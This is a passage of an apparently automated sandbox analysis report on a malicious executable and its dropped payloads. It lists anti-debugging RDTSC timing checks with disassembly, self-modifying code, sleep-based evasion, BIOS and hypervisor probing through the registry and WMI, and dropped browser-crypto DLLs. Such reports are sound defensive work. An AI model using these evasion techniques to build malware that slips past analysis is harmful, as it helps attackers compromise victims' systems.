Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A00850 second address: A0085F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F10E0B669C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0085F second address: A00864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0442A second address: A0444C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 jns 00007F10E0B669C8h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0444C second address: A04456 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F10E0E4A426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A04456 second address: A0445B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A046A9 second address: A046C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10E0E4A437h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0727F second address: A07283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0D970 second address: A0D976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0D976 second address: A0D987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669CAh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0D987 second address: A0D9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10E0E4A42Bh 0x00000009 jmp 00007F10E0E4A42Dh 0x0000000e rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0D9A3 second address: A0D9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0D9A9 second address: A0D9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F10E0E4A426h 0x0000000e rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0D9B7 second address: A0D9BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0CF51 second address: A0CF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0CF56 second address: A0CF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10E0B669D2h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0CF6C second address: A0CF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0CF72 second address: A0CF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F10E0B669D0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0D115 second address: A0D119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0D4FB second address: A0D523 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F10E0B669CEh 0x00000015 popad 0x00000016 je 00007F10E0B669D0h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0E03C second address: A0E040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0E707 second address: A0E70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0E70B second address: A0E71F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jp 00007F10E0E4A426h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0E7DB second address: A0E7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0E7E5 second address: A0E7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0E7EE second address: A0E7F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0ED1E second address: A0ED4B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007F10E0E4A434h 0x0000000d xchg eax, ebx 0x0000000e xor dword ptr [ebp+122D2904h], esi 0x00000014 mov dword ptr [ebp+122D2899h], ebx 0x0000001a nop 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0ED4B second address: A0ED6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F10E0B669D5h 0x00000011 jmp 00007F10E0B669CFh 0x00000016 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0EF26 second address: A0EF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0F193 second address: A0F19D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F10E0B669C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0F19D second address: A0F1A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0F30C second address: A0F32F instructions: 0x00000000 rdtsc 0x00000002 js 00007F10E0B669CCh 0x00000008 jnc 00007F10E0B669C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F10E0B669D0h 0x00000018 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A0F32F second address: A0F343 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D2A95h], edx 0x0000000f push eax 0x00000010 push ebx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A10165 second address: A10169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A10006 second address: A10021 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A42Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F10E0E4A428h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A127E3 second address: A127E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A127E8 second address: A1285C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F10E0E4A42Ah 0x0000000e nop 0x0000000f sbb edi, 7F5B392Fh 0x00000015 movzx edi, ax 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F10E0E4A428h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F10E0E4A428h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 pushad 0x00000051 mov eax, dword ptr [ebp+122D2F08h] 0x00000057 cmc 0x00000058 popad 0x00000059 push eax 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d ja 00007F10E0E4A426h 0x00000063 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A13298 second address: A1329E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A1329E second address: A13346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F10E0E4A428h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D39E8h], eax 0x0000002b or di, 731Bh 0x00000030 mov edi, 37BBFA04h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F10E0E4A428h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 and esi, dword ptr [ebp+122D2F38h] 0x00000057 push 00000000h 0x00000059 call 00007F10E0E4A42Dh 0x0000005e cld 0x0000005f pop esi 0x00000060 xchg eax, ebx 0x00000061 jc 00007F10E0E4A42Eh 0x00000067 jnl 00007F10E0E4A428h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jnl 00007F10E0E4A43Eh 0x00000076 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A13EB3 second address: A13EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A13EB7 second address: A13EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A13EBB second address: A13EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A13EC1 second address: A13EF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F10E0E4A437h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A109A5 second address: A109A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A16638 second address: A1663E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A17E3A second address: A17E40 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: A17E40 second address: A17E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	RDTSC instruction interceptor: First address: 9C41E5 second address: 9C41E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 99F8C8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B4B2F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 99D0EA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B79DC3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BE0837 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Special instruction interceptor: First address: A02E01 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Special instruction interceptor: First address: A8FB17 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: DB2E01 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: E3FB17 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 42ED5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 5D3756 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 5D2372 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 42C22E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 5FD738 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 42ED16 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 5EAA4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 664685 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Special instruction interceptor: First address: 121F8C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Special instruction interceptor: First address: 13CB2F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Special instruction interceptor: First address: 121D0EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Special instruction interceptor: First address: 13F9DC3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Special instruction interceptor: First address: 1460837 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 64F8C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7FB2F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 64D0EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 829DC3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 890837 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Special instruction interceptor: First address: F9DE40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Special instruction interceptor: First address: F9DD30 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Special instruction interceptor: First address: 115071A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Special instruction interceptor: First address: FA5006 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 62CF8C8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 647B2F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 62CD0EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 64A9DC3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Special instruction interceptor: First address: 6510837 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Memory allocated: 4F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Memory allocated: 5130000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Memory allocated: 4F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Memory allocated: 48C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Memory allocated: 4B00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Memory allocated: 48C0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\DocumentsJDAKJDAAFB.exe

Code function: 19_2_052306B4 rdtsc

19_2_052306B4

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 410
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2949
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2951
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 890
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 392

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 0.4 %

Source: C:\Users\user\Desktop\file.exe TID: 5948	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8604	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8604	Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7920	Thread sleep count: 63 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7920	Thread sleep time: -126063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7728	Thread sleep count: 410 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7728	Thread sleep time: -12300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7864	Thread sleep count: 2949 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7864	Thread sleep time: -5900949s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7912	Thread sleep count: 2951 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7912	Thread sleep time: -5904951s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8000	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9156	Thread sleep count: 65 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9156	Thread sleep time: -130065s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7864	Thread sleep count: 890 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7864	Thread sleep time: -1780890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7912	Thread sleep count: 392 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7912	Thread sleep time: -784392s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe TID: 7980	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe TID: 5728	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe TID: 4124	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe TID: 4128	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe TID: 2696	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe TID: 3168	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsJDAKJDAAFB.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C66C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

